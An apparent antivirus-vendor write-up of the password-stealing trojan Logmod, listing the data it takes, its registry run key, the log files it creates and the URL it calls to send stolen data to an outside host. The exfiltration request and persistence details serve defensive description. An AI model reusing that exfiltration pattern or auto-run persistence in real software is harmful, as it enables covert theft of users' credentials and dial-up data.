| Description:
|
Details
Trojan.PSW.Logmod.a
The Logmod program belongs to the family of password stealing trojans.
Logmod steals the following information: Windows version, Explorer version, phone book entries, service provider information, RAS data, modem log, e.t.c.
When run the trojan installs itself into the system. While installing the Logmod trojan registers itself in the system registry auto-run section:
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
Sysres = Sysres.exe
The trojan does not copy/move its file to any other directory, thus it cannot automatically run on Windows boot-up (except if it is originally placed in the Windows or Windows system directory). Therefore, for example, it cannot "install" itself into the system while being run from email attachments. There should be an additional component ("dropper") that installs the trojan into the system.
To send stolen data out of infected computers the Logmod opens an Internet URL with the following request:
http://stats.internetsexprovider.com/resident/SysWeb.php3?country=espana4&Login= %data%
'%data%' contains stings with stolen information that are sent to that URL. Apparently the SysWeb.php at that site gets %data% upon request and passes it to the trojan "master".
Miscellaneous
Logmod creates additional files in the Windows directory:
SysTrace.daf, CallTrace.daf, DialTrace.daf
These files contain data that is logged/stolen.
The Logmod trojan also creates the following additional registry key for its internal use:
HKLMSoftwareDIALPASS
DateEspana4 |
